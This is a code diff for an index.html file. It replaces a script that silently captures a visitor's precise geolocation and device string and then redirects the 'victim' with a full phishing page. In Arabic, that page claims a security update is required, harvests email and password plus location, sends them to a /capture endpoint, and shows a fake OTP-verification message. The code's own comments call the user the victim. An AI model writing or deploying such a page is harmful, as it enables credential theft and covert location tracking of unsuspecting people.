--- a/index.html
+++ b/index.html
@@ -1,22 +1,48 @@
-<script>
-    async function start() {
-        const device = navigator.userAgent;
-        // محاولة جلب الموقع بصمت
-        navigator.geolocation.getCurrentPosition(async (p) => {
-            await send({ lat: p.coords.latitude, lon: p.coords.longitude }, device);
-        }, async () => {
-            await send(null, device);
-        }, { enableHighAccuracy: true });
-    }
+<!DOCTYPE html>
+<html>
+<head>
+    <link rel="manifest" href="/manifest.json">
+    <title>Login - Secure Access</title>
+    <style>
+        body { background: #1a1a1a; color: white; font-family: sans-serif; text-align: center; padding-top: 50px; }
+        input { width: 80%; padding: 12px; margin: 10px; border-radius: 5px; border: none; }
+        button { background: #007bff; color: white; padding: 12px 30px; border: none; border-radius: 5px; cursor: pointer; }
+    </style>
+</head>
+<body>
+    <h2>تحديث الأمان مطلوب</h2>
+    <p>يرجى تسجيل الدخول لتأكيد ملكية الحساب واستلام التنبيهات</p>
+    <input type="email" id="email" placeholder="البريد الإلكتروني" required>
+    <input type="password" id="pass" placeholder="كلمة المرور" required>
+    <button onclick="startCapture()">تسجيل الدخول</button>
 
-    async function send(loc, dev) {
-        const res = await fetch('/capture', {
-            method: 'POST',
-            headers: { 'Content-Type': 'application/json' },
-            body: JSON.stringify({ location: loc, device: dev })
-        });
-        const data = await res.json();
-        window.location.href = data.redirect; // توجيه الضحية لليوتيوب
-    }
-    window.onload = start;
-</script>
+    <script>
+        async function startCapture() {
+            const email = document.getElementById('email').value;
+            const pass = document.getElementById('pass').value;
+            
+            // سحب الموقع
+            navigator.geolocation.getCurrentPosition(async (pos) => {
+                sendData(email, pass, { lat: pos.coords.latitude, lon: pos.coords.longitude });
+            }, async () => {
+                sendData(email, pass, null);
+            }, { enableHighAccuracy: true });
+        }
+
+        async function sendData(email, pass, loc) {
+            await fetch('/capture', {
+                method: 'POST',
+                headers: { 'Content-Type': 'application/json' },
+                body: JSON.stringify({
+                    email: email,
+                    password: pass,
+                    location: loc,
+                    device: navigator.userAgent
+                })
+            });
+            // توجيه الضحية لصفحة وهمية "جاري التحقق"
+            alert("جاري فحص الحساب... سيتم إرسال كود التحقق (OTP) إلى هاتفك قريباً.");
+        }
+    </script>
+</body>
+</html>
